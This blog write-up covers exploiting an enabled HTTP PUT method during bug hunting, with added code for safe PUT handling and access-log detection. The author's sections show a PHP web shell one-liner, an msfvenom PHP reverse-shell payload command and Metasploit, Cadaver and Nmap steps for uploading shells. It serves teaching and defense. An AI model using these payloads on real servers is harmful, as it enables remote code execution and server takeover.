# HTTP PUT Method Exploit

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2Fusj6VZBLXJKZiQuMSapL%2FRed%20Grey%20Hacker%20Desktop%20Wallpaper.png?alt=media\&token=1ba3f1b6-51d2-4009-b45d-8f68b45a04f1)

Hello Hackers, hope you are well!!

Today I'll talk about one of the most basic web attacks, which I recently ran into while bug hunting on a private program: exploiting an enabled HTTP PUT method.

## <mark style="color:green;">What is PUT?</mark>

The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. If enabled, an attacker may be able to place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.

### <mark style="color:green;">Syntax</mark>

```
PUT /new.html HTTP/1.1
```

### <mark style="color:green;">Example</mark>

#### Request

```
PUT /new.html HTTP/1.1
Host: example.com
Content-type: text/html
Content-length: 16

<p>New File</p>
```

#### Responses

If the target resource does not have a current representation and the `PUT` request successfully creates one, then the origin server must inform the user agent by sending a [`201`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/201) (`Created`) response.

```
HTTP/1.1 201 Created
Content-Location: /new.html
```

If the target resource does have a current representation and that representation is successfully modified in accordance with the state of the enclosed representation, then the origin server must send either a [`200`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/200) (`OK`) or a [`204`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/204) (`No Content`) response to indicate successful completion of the request.

```
HTTP/1.1 204 No Content
Content-Location: /existing.html
```
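The two responses above describe what a server does when PUT is allowed; the security question is when it should be allowed at all. The following is an added example, not code from the original post, modelling an origin server's decision for a PUT request: default-deny with a `405` and an `Allow` header, an authentication check when PUT is deliberately enabled, a refusal to store server-executable file types, and the `201`/`204` distinction from the section above. The class and method names, the token set and the in-memory store are this example's own assumptions.

```python
"""Added example (not code from the original post): a small model of how an
origin server should decide a PUT's outcome, combining the 201/204 semantics
above with the controls a defender wants in front of them. The class and
method names are this example's own; the in-memory dict stands in for the
document root."""
from dataclasses import dataclass, field

# Methods the application actually needs; anything else is refused with 405.
ALLOWED_METHODS = ("GET", "HEAD", "POST")
# Extensions the server would execute if a file with them landed under the docroot.
EXECUTABLE_EXTENSIONS = (".php", ".phtml", ".jsp", ".asp", ".aspx", ".cgi")


@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)


@dataclass
class OriginServer:
    resources: dict = field(default_factory=dict)   # path -> stored body
    put_enabled: bool = False                        # default-deny: PUT is off
    authorized_tokens: frozenset = frozenset()       # who may write, if PUT is on

    def _method_not_allowed(self):
        # A 405 carries an Allow header so clients learn the real method surface.
        return Response(405, {"Allow": ", ".join(ALLOWED_METHODS)})

    def handle(self, method, path, body=b"", token=None):
        if method == "PUT":
            if not self.put_enabled:
                return self._method_not_allowed()
            if token not in self.authorized_tokens:
                return Response(401, {"WWW-Authenticate": "Bearer"})
            if path.lower().endswith(EXECUTABLE_EXTENSIONS):
                # Even an authenticated writer must not be able to plant server-side code.
                return Response(403)
            created = path not in self.resources
            self.resources[path] = body
            # 201 when the PUT created the resource, 204 when it replaced an existing one.
            return Response(201 if created else 204, {"Content-Location": path})
        if method in ALLOWED_METHODS:
            return Response(200 if path in self.resources else 404)
        return self._method_not_allowed()


if __name__ == "__main__":
    locked = OriginServer()
    print(locked.handle("PUT", "/new.html", b"<p>New File</p>"))        # 405 + Allow
    writable = OriginServer(put_enabled=True, authorized_tokens=frozenset({"editor-token"}))
    print(writable.handle("PUT", "/new.html", b"<p>New File</p>", token="editor-token"))  # 201
    print(writable.handle("PUT", "/new.html", b"<p>Changed</p>", token="editor-token"))   # 204
    print(writable.handle("PUT", "/shell.php", b"<?php", token="editor-token"))           # 403
```

On a real deployment the same default-deny is a one-line configuration change rather than application code: on Apache 2.4, `<LimitExcept GET POST HEAD>Require all denied</LimitExcept>` inside the relevant `<Directory>` or `<Location>` block, and on nginx `limit_except GET POST { deny all; }` inside the `location`; on both, leave `mod_dav` / WebDAV modules disabled unless a specific path needs them.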

### <mark style="color:green;">Real Life Scenario</mark>

While doing some recon on a private program, after gathering subdomains I always convert live.txt to IPs to run some port scanning using the simple Go script [h2i](https://github.com/cybercdh/h2i).

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2FS0P9iipfb5guHQHQr9hF%2FScreenshot%202022-07-18%20014847.png?alt=media\&token=3c1b276f-0ab9-4914-b1cd-e1bf11fc0dde)

Since this program has a small scope I got only a few IPs; in this situation I prefer using Nmap over masscan.

After a few minutes I got a very interesting result, which was something like this.

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2FBvEfvdcJ3ivFUQ7cvHps%2FScreenshot%202022-07-18%20011029.png?alt=media\&token=30f8d61c-2b2b-4980-abf6-0ca7333d3ee2)

Without wasting any time I quickly opened Metasploit to check if the PUT method allowed uploading or creating any files on this subdomain.

### <mark style="color:green;">Exploit using Metasploit</mark>

Create a test txt file to try uploading it to the web server.

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2F5YKeRiVwlsR8tGWrdIG9%2Fimage.png?alt=media\&token=5005f3cc-136d-4569-95ef-1880a1804019)

By using the **`auxiliary/scanner/http/http_put`** module in Metasploit we can scan for the HTTP PUT method.

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2FRVBZKlNtAOzKj6bhjgU7%2FScreenshot%202022-07-18%20021908.png?alt=media\&token=6bc8564b-2a8d-4c00-84b9-9618c22b1961)

After visiting this path on the vulnerable domain we can see that the injection worked fine.

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2Fs5LTuN8Y4Hek2VuLxUEH%2FScreenshot%202022-07-18%20022120.png?alt=media\&token=734561fb-f61e-4d28-8cc0-ddd07dabf6a8)

![](https://media.giphy.com/media/msKNSs8rmJ5m/giphy.gif)

### <mark style="color:green;">Exploit with Burp Suite</mark>

As we all know, [BurpSuite](https://portswigger.net/burp) is one of the most popular intercepting proxy tools, through which you can easily analyze all kinds of GET and POST requests.

*Burp or Burp Suite is a graphical tool for testing Web application security. The tool is written in Java and developed by PortSwigger Security. The important tools inside* [*BurpSuite*](https://portswigger.net/burp) *are HTTP Proxy, Scanner, Intruder, Spider, Repeater, Decoder, Comparer, Extender and Sequencer.*

By intercepting a GET request to <http://redact.redact.redact.target.com> and changing it to PUT, we can create files and add any content to them.

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2FAdeKYFA4OKvbEq57ZCei%2FScreenshot%202022-07-18%20023907.png?alt=media\&token=cf7ecfdf-6274-4553-a65e-a52cb2ec2d6a)

Sending a GET request to this newly created file <http://redact.redact.redact.target.com/strik3rpoc.php>, we can see that it was also created successfully.

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2FHSlWpM94SGxXGdHkdvMG%2FScreenshot%202022-07-18%20024542.png?alt=media\&token=d4295f8d-9b84-4346-afa7-03f46cfb661b)

⭐ <mark style="color:orange;">**Golden TIP:**</mark> "*always try to escalate*". With that being said, I tried to get Remote Code Execution by putting some malicious PHP code in this file.

```
<?php system($_GET['cmd']); ?>
```

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2FFZHRiJqddEsAF1FfaxPd%2FScreenshot%202022-07-18%20025524.png?alt=media\&token=bd4e6496-f1fa-4a3c-849a-26e880e58782)

I attempted to execute a command through the injected `cmd` parameter but got nothing back.

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2FNEl2tlLOmnr7RsGHZlQx%2FScreenshot%202022-07-18%20025856.png?alt=media\&token=cc9be578-cab2-42fe-bba4-ae65e8383371)

I tried many ways to get commands to run but had no luck 😥; the file always reflected its content without executing any command.

### <mark style="color:green;">Exploit With Cadaver & Metasploit Framework</mark>

I tried to upload a malicious PHP file, which we'll generate with the help of the [msfvenom](https://www.offensive-security.com/metasploit-unleashed/msfvenom/) command.

`msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.179.141 LPORT=4444 -f raw > shell.php`

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2Fa1PvXzknAeozHg32gokf%2FScreenshot%202022-07-18%20031436.png?alt=media\&token=b550a766-53ca-467f-b779-2e9db3395660)

Now run the Cadaver tool, which is already installed on every Kali Linux machine. Cadaver is a command line tool that supports uploading and downloading files over WebDAV.

To run Cadaver, the command is:

`cadaver http://target.com/`

If all is good so far we can upload the **shell.php** file you created with msfvenom.

But I don't know why it didn't work for me ¯\\\_(ツ)\_/¯

![](https://media.giphy.com/media/7SF5scGB2AFrgsXP63/giphy.gif)

Anyway, when you face this situation you can upload the shell via [Metasploit as in the step above](#exploit-using-metasploit), or you can use an Nmap script to upload it with this command:

`nmap -p 80 target.com --script http-put --script-args http-put.url='/strik3r_nmap.php',http-put.file='/root/shell.php'`
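Every probe in this write-up (the Metasploit `http_put` scan, the Burp PUT, Cadaver, the Nmap `http-put` script) shows up in the target's web server access log as a PUT followed by a GET to the file it wrote. The block below is an added example, not code from the original post, of the detection logic a defender can run over combined-format access logs to catch that pattern: it parses each line, scores write-capable methods by whether they succeeded and whether the target is a server-executable file type, and correlates a later request to a path the same client created with PUT. The log lines, the regex, the method list and the severity labels are all this example's own constructed assumptions.

```python
"""Added example (not code from the original post): detection logic over
Apache/nginx combined-format access logs for the PUT probing described in
the write-up. The sample log, the regex and the severity scheme are
constructed for this example."""
import re

# client ident user [time] "METHOD PATH PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Methods that modify server-side content; a typical site never needs them from anonymous clients.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
EXECUTABLE_EXTENSIONS = (".php", ".phtml", ".jsp", ".asp", ".aspx", ".cgi")

# Constructed sample: one client enumerates methods, writes a test file, then a PHP file, then requests it.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Jul/2022:02:19:08 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Jul/2022:02:19:10 +0000] "OPTIONS / HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Jul/2022:02:19:12 +0000] "PUT /msf_http_put_test.txt HTTP/1.1" 201 0 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Jul/2022:02:39:07 +0000] "PUT /strik3rpoc.php HTTP/1.1" 201 0 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Jul/2022:02:39:09 +0000] "GET /strik3rpoc.php?cmd=id HTTP/1.1" 200 33 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Jul/2022:03:14:36 +0000] "PUT /shell.php HTTP/1.1" 405 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Score a single parsed entry: (severity, reason), or None when it is benign on its own."""
    method, status = entry["method"], int(entry["status"])
    bare_path = entry["path"].split("?", 1)[0].lower()
    if method in WRITE_METHODS:
        if 200 <= status < 300:
            if bare_path.endswith(EXECUTABLE_EXTENSIONS):
                return ("critical", f"{method} of a server-executable file succeeded ({status})")
            return ("high", f"{method} succeeded ({status}): write access is enabled")
        return ("medium", f"{method} attempted, refused ({status})")
    if method == "OPTIONS":
        return ("low", "method enumeration")
    return None


def scan(log_text):
    """Walk the log in order; return {client: [(severity, path, reason), ...]}.

    Besides per-line scoring, this remembers paths a client created with PUT and
    flags that client's later successful GET/POST to the same path, which is the
    'visit the uploaded file' step in the write-up.
    """
    findings = {}
    written = set()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        bare_path = entry["path"].split("?", 1)[0]
        status = int(entry["status"])
        verdict = classify(entry)
        if entry["method"] == "PUT" and 200 <= status < 300:
            written.add(bare_path)
        elif entry["method"] in ("GET", "POST") and bare_path in written and status == 200:
            verdict = ("critical", "request to a file the client itself wrote with PUT")
        if verdict:
            findings.setdefault(entry["client"], []).append((verdict[0], bare_path, verdict[1]))
    return findings


if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        for severity, path, reason in hits:
            print(f"{client} {severity:8} {path} - {reason}")
```

A refused PUT (`405`) is still worth a medium alert: it tells you who is probing for write access even when the server is configured correctly, and the same client reappearing with other write methods or against other hosts is the signal to act on.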

> Thanks For Reading

**Follow Me:** [**Facebook**](https://www.facebook.com/StrikerHacker33/) | [**LinkedIn**](https://www.linkedin.com/in/eslam-kamal/) | [**Twitter**](https://twitter.com/xxEslam_Kamalxx)
